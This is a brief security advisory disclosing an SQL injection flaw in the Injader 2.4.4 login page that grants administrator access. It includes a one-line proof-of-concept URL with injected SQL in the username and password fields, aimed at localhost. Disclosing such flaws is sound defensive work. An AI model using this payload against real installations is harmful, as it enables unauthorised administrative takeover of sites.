Home
Consulting
Advisories
Software
Articles
Contact

Injader 2.4.4 SQL Injection

Legacy Advisories

Description

An SQL injection vulnerability in Injader 2.4.4 can be exploited to login with administrative privileges.

Proof Of Concept

http://localhost/injader/login.php?un=\\'%20or%20id=1%20and%20'a'='a&pw=\\'%20or%20'a'='a


Copyright © 2018 AutoSec Tools LLC